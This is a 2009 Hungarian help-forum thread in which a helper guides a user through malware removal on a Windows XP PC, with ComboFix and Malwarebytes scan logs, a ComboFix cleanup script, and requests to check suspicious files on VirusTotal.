[HKEY_LOCAL_MACHINE\System\ControlSet003\Services\vbev5mp]
"ImagePath"="system32\DRIVERS\vbev5mp.sys"
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Installer\UserData\LocalSystem\Components\•€|˙˙˙˙"•€|ţ»Ów*]
"AB141C35E9F4BF344B9FC010BB17F68A"="02:\\Software\\Adobe\\FeatureSubscriptions\\DVAAdobeDocMeta\\{53C141BA-4F9E-43FB-B4F9-0C01BB716FA8}\\Registered"

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Reinstall\hŃ*.Poc]
"DisplayName"="?\11"
"DeviceDesc"="?\11"
"ProviderName"="?\11???\11\08"
"MFG"="??\09"
"ReinstallString"="8.470.0.0000"
"DeviceInstanceIds"=multi:"k:\\driver\\ati driver\\xp\\driver\\xp_inf\\cx_60150.inf\00"
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(1612)
c:\program files\SUPERAntiSpyware\SASWINLO.dll
c:\windows\system32\Ati2evxx.dll

- - - - - - - > 'lsass.exe'(1676)
c:\windows\system32\relog_ap.dll

- - - - - - - > 'explorer.exe'(2812)
c:\program files\ComfortClipboard\CClipboardH.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
c:\windows\system32\msi.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Alwil Software\Avast4\aswUpdSv.exe
c:\program files\Alwil Software\Avast4\ashServ.exe
c:\program files\Common Files\Acronis\Schedule2\schedul2.exe
c:\windows\ATKKBService.exe
c:\program files\cFosSpeed\spd.exe
c:\program files\ComfortClipboard\CClipboardCm.exe
c:\program files\Virtual CD v5\System\VC5Tray.exe
c:\program files\Comodo\Firewall\cmdagent.exe
c:\program files\Diskeeper Corporation\Diskeeper\DkService.exe
c:\program files\Java\jre6\bin\jqs.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
c:\program files\Common Files\LightScribe\LSSrvc.exe
c:\windows\system32\lvhidsvc.exe
c:\program files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
c:\program files\NetLimiter 2 Pro\nlsvc.exe
c:\program files\Hewlett-Packard\Digital Imaging\bin\hpqste08.exe
c:\program files\CDBurnerXP\NMSAccessU.exe
c:\windows\system32\HPZipm12.exe
c:\program files\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe
c:\program files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
c:\program files\HHVcdV5Sys\VC5SecS.exe
c:\program files\NetLimiter 2 Pro\NLClient.exe
c:\program files\Alwil Software\Avast4\ashMaiSv.exe
c:\program files\Alwil Software\Avast4\ashWebSv.exe
c:\windows\system32\lxcccoms.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
.
**************************************************************************
.
Completion time: 2009-06-20 15:22 - machine was rebooted
ComboFix-quarantined-files.txt 2009-06-20 13:22
ComboFix2.txt 2009-06-20 06:46
ComboFix3.txt 2009-01-13 13:05

Pre-Run: 616 050 688 bájt szabad
Post-Run: 610 746 368 bájt szabad

Current=3 Default=3 Failed=2 LastKnownGood=4 Sets=1,2,3,4
384





Malwarebytes' Anti-Malware 1.38
Adatbázis verzió: 2314
Windows 5.1.2600 Szervizcsomag 2

2009.06.20. 19:05:25
mbam-log-2009-06-20 (19-05-07).txt

Vizsgálat típusa: Gyorsvizsgálat
Átvizsgált objektumok: 95775
Eltelt idő: 5 minute(s), 26 second(s)

Fertőzött memóriafolyamatok: 0
Fertőzött memória modulok: 0
Fertőzött rendszerleíró kulcsok: 0
Fertőzött rendszerleíró értékek: 0
Fertőzött rednszerleíró elemek: 2
Fertőzött mappák: 0
Fertőzött fájlok: 0

Fertőzött memóriafolyamatok:
(Nem észleltem rosszindulatú elemeket)

Fertőzött memória modulok:
(Nem észleltem rosszindulatú elemeket)

Fertőzött rendszerleíró kulcsok:
(Nem észleltem rosszindulatú elemeket)

Fertőzött rendszerleíró értékek:
(Nem észleltem rosszindulatú elemeket)

Fertőzött rednszerleíró elemek:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\UpdatesDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.

Fertőzött mappák:
(Nem észleltem rosszindulatú elemeket)

Fertőzött fájlok:
(Nem észleltem rosszindulatú elemeket)


ez a kulcs visszakapcsolta a Windows tűzfalát (comodot hasznélok)


szomb. jún. 20, 2009 18:34
Profil Privát üzenet küldése
platina tag
Avatar

Csatlakozott: szomb. feb. 03, 2007 11:36
Hozzászólások: 528
Hozzászólás 
Ok ! kösz! :!:


szomb. jún. 20, 2009 15:56
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
udv szergej
minden lehetseges,
start futatas masold be control userpasswords2 ok
es it bealithatod visza ahogy volt
pilaka
Kinyitod a Notepadot>Start>futatas>beirod notepad
Es bemasolod a piros[zold] textet
Kód:
KILLALL::
File::
c:\windows\S06C0D312.tmp
RegNull::
[HKEY_USERS\S-1-5-21-117609710-1078081533-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{6BC31396-740D-B4B5-B08B-BC74AF917057}*]
[HKEY_USERS\S-1-5-21-117609710-1078081533-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{A873A6C7-2DF7-2ABE-BD1E-352FFC8F3EDB}*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{47629D4B-2AD3-4e50-B716-A66C15C63153}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{604BB98A-A94F-4a5c-A67C-D8D3582C741C}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{74554CCD-F60F-4708-AD98-D0152D08C8B9}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{684373FB-9CD8-4e47-B990-5A4466C16034}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{7EB537F9-A916-4339-B91B-DED8E83632C0}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{948395E8-7A56-4fb1-843B-3E52D94DB145}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{AC3ED30B-6F1A-4bfc-A4F6-2EBDCCD34C19}\InprocServer32*
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{DE5654CA-EB84-4df9-915B-37E957082D6D}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{E39C35E8-7488-4926-92B2-2F94619AC1A5}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{EACAFCE5-B0E2-4288-8073-C02FF9619B6F}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{F8F02ADD-7366-4186-9488-C21CB8B3DCEC}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{FEE45DE2-A467-4bf9-BF2D-1411304BCD84}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Installer\UserData\LocalSystem\Components\?•€|˙˙˙˙"•€|ţ»Ów*]
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Reinstall\hŃ*.Poc]
RegLock::
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\ProgID]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\Programmable]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\TypeLib]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\VersionIndependentProgID]

Mostan>a notepadon elso full-fajl>ballfelsosarokban>4-sor>lementenni mint....
A txt-hejetfajlnev beteszed eztett>CFScript.txt<alatta bealitod >minden fajl<
legfelull>asztall i<klik gomb letenni.Es mostan megcsinalod eztett:
Kép
A combofix maga elindul es lehet hogy restartol es befejezi a scent.Amit majd ad ted ide
:arrow: letoltod a Malware bytes programot,csinalj gyors skant a logot ted ide,
http://www.download.com/Malwarebytes-An ... tag=button


szomb. jún. 20, 2009 13:46
Profil Privát üzenet küldése Honlap
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
http://www.virustotal.com/hu/analisis/9 ... 1245498467
http://www.virustotal.com/hu/analisis/7 ... 1245497833

elkezdtem bemásolni ide a linkeket ...de röviden: egyiknél sincs egy találat sem........


szomb. jún. 20, 2009 13:01
Profil Privát üzenet küldése
platina tag
Avatar

Csatlakozott: szomb. feb. 03, 2007 11:36
Hozzászólások: 528
Hozzászólás 
Üdv stell !
Ván egy újra telepitet gépem , már Xp s.p. 3 van rajta hogy lehet az hogy mindig kelett klikkelni a felhasználó ikonnyara a belépéshez most meg egyszer csak magától belépet újraindítás után ? lehet boot virus ? :shock:


A hozzászólást 1 alkalommal szerkesztették, utoljára rozumnij sergej nyikolaje szomb. jún. 20, 2009 13:17-kor.



szomb. jún. 20, 2009 12:38
Profil Privát üzenet küldése
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
Csinálom , de a Virustotal túlterhelt...............


szomb. jún. 20, 2009 12:20
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
VIRUSTOTALu
teszteld le a virustotalon egyenkent ezeket a tesztrol a linkeket ted ide,
Idézet:
c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_35bf2b9f.exe
c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_7e834bd2.exe
c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_7e8021d5.exe
c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_737a1221.exe
a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_3b7137e6.exe
c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_6ff64da0.exe
c:\windows\system32\DRIVERS\vbev5mp.sys


szomb. jún. 20, 2009 11:38
Profil Privát üzenet küldése Honlap
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
a Fix-downadup a keresés után rögtön felkínált egy Microsoft biztonsági frissítést és ha, módja lett volna le is töltötte volna .


szomb. jún. 20, 2009 8:06
Profil Privát üzenet küldése
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
Az F-Secure downadupját is megpróbáltam, el is indult a C: - n át is vizsgált mappákat azt írta hozzájuk , hogy clean ....de amikor azt írta , hogy system scanning a kurzor villogásán kívül nem történt semmi (20 percig )

Természetesen a dolgokat az általad leírt sorrendben csináltam.


szomb. jún. 20, 2009 8:02
Profil Privát üzenet küldése
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
ComboFix 09-06-18.02 - PALI 009.06.20. 8:28.1 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1250.36.1038.18.1023.451 [GMT 2:00]
Running from: c:\documents and settings\PALI\Asztal\ComboFix.exe
AV: avast! antivirus 4.8.1335 [VPS 090618-0] *On-access scanning disabled* (Updated) {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: COMODO Firewall Pro *enabled* {043803A3-4F86-4ef6-AFC5-F6E02A79969B}

WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\windows\system32\ATIODCLI.exe
c:\windows\system32\ATIODE.exe
c:\documents and settings\PALI\Local Settings\Temporary Internet Files\CD2000Setup.exe
c:\windows\IE4 Error Log.txt
c:\windows\system32\0ecf8441.dll

.
((((((((((((((((((((((((( Files Created from 2009-05-20 to 2009-06-20 )))))))))))))))))))))))))))))))
.

2009-06-19 17:18 . 2009-06-19 17:18 26624 ----a-w- c:\windows\system32\drivers\fsbts.sys
2009-06-19 17:17 . 2009-06-20 06:07 -------- d-----w- c:\documents and settings\Rendszergazda\Local Settings\Application Data\Adobe
2009-06-19 09:53 . 2009-06-19 10:01 -------- d-----w- C:\rsit
2009-06-19 08:29 . 2009-06-19 08:29 -------- d-----w- c:\documents and settings\PALI\Application Data\Convivea
2009-06-19 08:29 . 2009-04-10 16:40 118784 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\x.exe
2009-06-19 08:29 . 2008-03-28 08:07 20992 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\languages\compare.exe
2009-06-19 08:29 . 2008-03-28 08:02 60928 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\update.exe
2009-06-19 08:29 . 2007-07-11 17:43 24557 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\special.exe
2009-06-19 08:29 . 2003-08-19 03:06 80896 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\x.dll
2009-06-19 08:29 . 2009-06-19 08:29 -------- d-----w- c:\program files\Bit Che
2009-06-18 06:03 . 2008-12-11 06:38 159600 ----a-w- c:\windows\system32\drivers\pctgntdi.sys
2009-06-18 06:02 . 2009-04-03 09:18 130936 ----a-w- c:\windows\system32\drivers\PCTCore.sys
2009-06-18 06:02 . 2008-12-18 10:16 73840 ----a-w- c:\windows\system32\drivers\PCTAppEvent.sys
2009-06-18 06:02 . 2009-06-18 06:03 -------- d-----w- c:\program files\Common Files\PC Tools
2009-06-18 06:02 . 2008-12-10 09:36 64392 ----a-w- c:\windows\system32\drivers\pctplsg.sys
2009-06-18 06:02 . 2009-06-18 06:02 -------- d-----w- c:\documents and settings\All Users\Application Data\PC Tools
2009-06-17 17:36 . 2009-06-18 06:02 51328 ----a-w- c:\windows\system32\drivers\inspect.sys
2009-06-17 17:36 . 2009-06-18 06:02 75520 ----a-w- c:\windows\system32\drivers\cmdmon.sys
2009-06-14 10:09 . 2009-06-14 10:09 -------- d-----w- c:\program files\xyr0x Security
2009-06-14 09:37 . 2009-04-10 13:37 2023768 ----a-w- c:\windows\system32\rapid.dll
2009-06-14 09:37 . 2009-04-08 12:05 16384 ---ha-w- c:\windows\system32\shell.exe
2009-06-14 09:37 . 2009-04-10 22:34 151552 ----a-w- c:\windows\system32\Rapid.exe
2009-06-14 09:37 . 2009-04-08 19:26 49 ---ha-w- c:\windows\system32\run.bat
2009-06-13 16:23 . 2009-06-14 20:24 -------- d-----w- c:\temp\{9F5FBC24-EFE2-4f90-B498-EC0FB7D47D15}
2009-06-12 15:29 . 2009-06-12 15:29 -------- d-----w- c:\program files\Driver Cleaner Pro
2009-06-10 20:37 . 2009-06-10 20:37 -------- d-----w- c:\documents and settings\PALI\Application Data\Ashampoo
2009-06-10 19:25 . 2009-06-10 19:25 -------- d-----w- c:\documents and settings\All Users\Application Data\ATI
2009-06-10 19:12 . 2009-03-16 14:04 11563008 ----a-w- c:\windows\system32\atioglxx.dll
2009-06-10 19:12 . 2009-03-16 13:40 49664 ----a-w- c:\windows\system32\atimpc32.dll
2009-06-10 19:12 . 2009-03-16 13:35 45056 ----a-w- c:\windows\system32\aticalrt.dll
2009-06-10 19:12 . 2009-03-16 13:35 131072 ----a-w- c:\windows\system32\atiadlxx.dll
2009-06-10 19:12 . 2009-03-16 13:34 45056 ----a-w- c:\windows\system32\aticalcl.dll
2009-06-10 19:12 . 2009-03-16 13:33 3264512 ----a-w- c:\windows\system32\aticaldd.dll
2009-06-10 19:12 . 2009-03-03 13:56 118784 ----a-w- c:\windows\system32\atibtmon.exe
2009-06-10 19:12 . 2009-02-26 05:40 99856 ----a-w- c:\windows\system32\drivers\AtiHdmi.sys
2009-06-10 18:42 . 2009-06-19 10:41 664 ----a-w- c:\windows\system32\d3d9caps.dat
2009-06-10 18:12 . 2005-05-07 10:43 69632 ------r- c:\windows\Alcmtr.exe
2009-06-08 20:31 . 2009-06-15 16:41 -------- d-----w- c:\program files\The FilmMachine
2009-06-08 20:19 . 2006-08-05 07:02 49152 ------r- c:\windows\system32\ChCfg.exe
2009-06-08 20:19 . 2006-07-25 08:14 86016 ------r- c:\windows\SoundMan.exe
2009-06-08 20:19 . 2006-05-20 10:04 2879488 ------r- c:\windows\SkyTel.exe
2009-06-08 20:19 . 2007-01-06 05:32 1191936 ------r- c:\windows\RtlUpd.exe
2009-06-08 20:19 . 2006-05-08 08:35 9709568 ------r- c:\windows\RTLCPL.exe
2009-06-08 20:19 . 2007-02-03 10:57 4474368 ------r- c:\windows\system32\drivers\RtkHDAud.sys
2009-06-08 20:19 . 2007-02-03 10:54 16116224 ------r- c:\windows\RTHDCPL.exe
2009-06-08 20:19 . 2006-10-15 09:42 2157568 ------r- c:\windows\MicCal.exe
2009-06-08 20:19 . 2006-05-08 08:26 2808832 ------r- c:\windows\alcwzrd.exe
2009-06-08 20:19 . 2009-06-10 18:12 -------- d-----w- c:\program files\Realtek
2009-06-08 20:19 . 2007-01-16 08:54 520192 ------r- c:\windows\RtlExUpd.dll
2009-06-05 21:53 . 2009-06-05 21:53 -------- d-----w- c:\documents and settings\PALI\Local Settings\Application Data\PCHealth
2009-06-05 21:50 . 2009-06-05 21:50 -------- d-----w- c:\documents and settings\PALI\Local Settings\Application Data\ATI
2009-06-05 21:50 . 2009-06-05 21:50 -------- d-----w- c:\documents and settings\PALI\Application Data\ATI
2009-06-05 21:48 . 2009-06-05 21:48 0 ----a-w- c:\windows\ativpsrm.bin
2009-06-05 21:33 . 2009-06-05 21:33 -------- d-----w- c:\program files\My Company Name
2009-06-05 21:27 . 2009-06-05 21:27 9158 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{89DE67AD-08B8-4699-A55D-CA5C0AF82BF3}\ARPPRODUCTICON.exe
2009-06-05 21:27 . 2009-06-05 21:27 -------- d-----w- c:\program files\Common Files\ATI Technologies
2009-06-05 21:26 . 2006-12-28 03:44 84992 ----a-r- c:\windows\system32\drivers\AtiHdAud.sys
2009-06-05 21:22 . 2009-03-16 14:17 307200 ----a-w- c:\windows\system32\atiiiexx.dll
2009-06-05 21:22 . 2009-03-16 14:27 442368 ----a-w- c:\windows\system32\ATIDEMGX.dll
2009-06-05 21:22 . 2008-02-19 13:37 887724 ----a-r- c:\windows\system32\ativva6x.dat
2009-06-05 21:22 . 2008-02-19 13:37 3107788 ----a-r- c:\windows\system32\ativva5x.dat
2009-06-05 21:21 . 2008-02-19 13:37 3107788 ----a-r- c:\windows\system32\ativvaxx.dat
2009-06-05 09:55 . 2009-02-23 15:39 184394 ----a-w- c:\windows\system32\atiicdxx.dat
2009-06-05 09:54 . 2009-06-10 19:20 -------- d-----w- c:\program files\ATI Technologies
2009-06-01 14:08 . 2009-06-01 14:08 -------- d-----w- c:\program files\FDRLab
2009-05-29 08:03 . 2009-05-29 08:03 -------- d-----w- c:\windows\system32\3Planesoft
2009-05-29 08:03 . 2009-05-29 08:03 -------- d-----w- c:\program files\3Planesoft Screensaver Manager
2009-05-29 08:03 . 2009-05-29 08:03 -------- d-----w- c:\program files\Tropical Fish 3D Screensaver

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-06-20 06:40 . 2008-11-01 20:52 -------- d-----w- c:\program files\cFosSpeed
2009-06-20 06:26 . 2008-11-21 17:19 82464 ----a-w- c:\windows\system32\perfc040.dat
2009-06-20 06:26 . 2008-11-21 17:19 414914 ----a-w- c:\windows\system32\perfh040.dat
2009-06-20 06:26 . 2004-08-18 12:00 449586 ----a-w- c:\windows\system32\perfh00E.dat
2009-06-20 06:26 . 2004-08-18 12:00 100660 ----a-w- c:\windows\system32\perfc00E.dat
2009-06-20 06:24 . 2008-12-24 11:42 -------- d---a-w- c:\documents and settings\All Users\Application Data\TEMP
2009-06-19 16:43 . 2008-11-01 11:53 -------- d-----w- c:\documents and settings\PALI\Application Data\uTorrent
2009-06-18 17:34 . 2008-12-24 11:42 -------- d-----w- c:\program files\Spyware Doctor
2009-06-18 10:23 . 2008-03-16 17:56 -------- d-----w- c:\program files\FairUse Wizard 2
2009-06-18 06:53 . 2008-03-16 19:54 -------- d-----w- c:\program files\Common Files\Elecard
2009-06-17 17:36 . 2009-01-13 19:32 -------- d-----w- c:\program files\Comodo
2009-06-16 07:58 . 2008-03-03 17:36 -------- d-----w- c:\documents and settings\PALI\Application Data\Vso
2009-06-14 20:52 . 2008-03-13 17:56 -------- d-----w- c:\program files\Avidemux 2.4
2009-06-13 21:38 . 2009-03-10 08:57 249856 ------w- c:\windows\Setup1.exe
2009-06-13 21:37 . 2009-03-10 08:57 73216 ----a-w- c:\windows\ST6UNST.EXE
2009-06-13 20:27 . 2009-04-07 19:22 -------- d-----w- c:\program files\MooGUI
2009-06-13 17:10 . 2008-11-01 15:11 -------- d-----w- c:\program files\Lx_cats
2009-06-10 21:18 . 2009-06-10 18:24 196608 ----a-w- c:\windows\system32\drivers\nStandard.bin
2009-06-10 20:37 . 2008-03-17 08:56 -------- d-----w- c:\program files\Ashampoo
2009-06-10 18:24 . 2009-01-01 14:45 -------- d-----w- c:\program files\ASUS
2009-06-10 18:24 . 2008-03-01 20:34 -------- d--h--w- c:\program files\InstallShield Installation Information
2009-06-09 16:55 . 2008-11-12 20:33 -------- d-----w- c:\program files\XRECODE
2009-06-09 14:00 . 2008-03-14 10:24 -------- d-----w- c:\program files\ChrisTV
2009-06-08 20:39 . 2008-03-02 21:04 -------- d-----w- c:\program files\AviSynth 2.5
2009-06-08 20:11 . 2008-03-02 19:04 -------- d-----w- c:\program files\MoBiMouse
2009-06-08 20:07 . 2008-11-22 15:47 -------- d-----w- c:\documents and settings\All Users\Application Data\InstallShield
2009-06-08 20:07 . 2008-03-06 18:03 -------- d-----w- c:\documents and settings\PALI\Application Data\InstallShield
2009-06-08 19:34 . 2008-03-03 17:42 -------- d-----w- c:\program files\Real Alternative
2009-06-06 20:45 . 2009-02-08 12:21 -------- d-----w- c:\documents and settings\PALI\Application Data\Free Download Manager
2009-06-06 20:45 . 2008-11-01 12:39 -------- d---a-w- c:\program files\USDownloader - Cap
2009-06-06 13:44 . 2008-03-26 22:46 -------- d-----w- c:\documents and settings\PALI\Application Data\Simple Sudoku
2009-06-06 13:40 . 2009-02-21 14:59 -------- d-----w- c:\program files\RapidSolution
2009-06-06 13:26 . 2009-02-21 14:44 -------- d-----w- c:\program files\Daniusoft
2009-06-04 22:40 . 2008-03-01 20:52 106496 ----a-w- c:\windows\DUMP691a.tmp
2009-05-11 22:41 . 2009-05-11 22:41 -------- d-----w- c:\program files\ProPoster
2009-05-11 22:31 . 2008-03-01 22:01 97016 ----a-w- c:\documents and settings\PALI\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2009-05-11 22:31 . 2009-05-11 22:31 -------- d-----w- c:\program files\Poster Forge
2009-05-11 22:13 . 2008-03-16 19:47 -------- d-----w- c:\program files\Sorenson Media
2009-05-11 22:12 . 2009-05-11 22:12 10134 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{38F48AED-66D8-464C-993E-C7296C7A199B}\ARPPRODUCTICON.exe
2009-05-11 22:11 . 2009-05-11 22:11 -------- d-----w- c:\program files\BIAS
2009-05-08 07:53 . 2009-05-08 07:36 -------- d-----w- c:\program files\PhotoFiltre Studio X
2009-05-08 07:37 . 2009-05-08 07:36 -------- d-----w- c:\documents and settings\PALI\Application Data\PhotoFiltre Studio X
2009-05-04 09:01 . 2008-11-27 10:57 135773 ----a-w- c:\windows\HPHins12.dat
2009-04-27 20:17 . 2009-03-05 21:21 -------- d-----w- c:\program files\abgx360
2009-04-07 19:22 . 2009-04-07 19:22 25214 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_35bf2b9f.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_7e834bd2.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_7e8021d5.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_737a1221.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_3b7137e6.exe
2009-04-07 19:22 . 2009-04-07 19:22 22486 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_6ff64da0.exe
2009-03-23 08:27 . 2009-03-23 08:27 747566 ----a-w- c:\windows\system32\abgx360.exe
2009-03-02 21:50 . 2009-03-02 21:49 24 --sh--w- c:\windows\S06C0D312.tmp
.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2004-08-18 15360]
"MSMSGS"="c:\program files\Messenger\Msmsgs.exe" [2008-06-02 1660952]
"DAEMON Tools"="c:\program files\DAEMON Tools\daemon.exe" [2007-04-03 165784]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"UserFaultCheck"="c:\windows\system32\dumprep 0 -u" [X]
"RecSche"="c:\program files\TVR\RecSche.exe" [2004-05-10 454656]
"ChrisTV Agent"="c:\program files\ChrisTV\ChrisTV_Agent.exe" [2005-05-02 187392]
"PinnacleDriverCheck"="c:\windows\system32\\PSDrvCheck.exe" [2004-03-10 406016]
"amd_dc_opt"="c:\program files\AMD\Dual-Core Optimizer\amd_dc_opt.exe" [2007-07-23 77824]
"lxccmon.exe"="c:\program files\Lexmark 3300 Series\lxccmon.exe" [2005-07-20 192512]
"FaxCenterServer"="c:\program files\Lexmark Fax Solutions\fm3032.exe" [2005-07-12 299008]
"cFosSpeed"="c:\program files\cFosSpeed\cFosSpeed.exe" [2007-10-17 854992]
"avast!"="c:\progra~1\ALWILS~1\Avast4\ashDisp.exe" [2009-02-05 81000]
"VC5Player"="c:\program files\HHVcdV5Sys\VC5Play.exe" [2003-11-07 176128]
"UnlockerAssistant"="c:\program files\Unlocker\UnlockerAssistant.exe" [2006-05-06 6656]
"CClipboard"="c:\program files\ComfortClipboard\CClipboard.exe" [2008-06-07 2843136]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-01-14 136600]
"CloneCDTray"="c:\program files\SlySoft\CloneCD\CloneCDTray.exe" [2006-09-28 57344]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2008-09-06 413696]
"ASUSGamerOSD"="c:\program files\ASUS\GamerOSD\GamerOSD.exe" [2007-10-23 380928]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2009-03-17 61440]
"LXCCCATS"="c:\windows\System32\spool\DRIVERS\W32X86\3\LXCCtime.dll" [2005-07-20 73728]
"COMODO Firewall Pro"="c:\program files\Comodo\Firewall\CPF.exe" [2009-06-18 1115728]
"SkyTel"="SkyTel.EXE" - c:\windows\SkyTel.exe [2006-05-20 2879488]
"RTHDCPL"="RTHDCPL.EXE" - c:\windows\RTHDCPL.exe [2007-02-03 16116224]

c:\documents and settings\All Users\Start Menu\Programs\Indˇt˘pult\
HP Digital Imaging Monitor.lnk - c:\program files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe [2006-2-19 288472]
hpoddt01.exe.lnk - c:\program files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe [2003-4-6 28672]
InterVideo WinCinema Manager.lnk - c:\program files\InterVideo\Common\Bin\WinCinemaMgr.exe [2008-12-14 167936]

[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2008-05-13 77824]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2008-12-22 10:05 356352 ----a-w- c:\program files\SUPERAntiSpyware\SASWINLO.dll

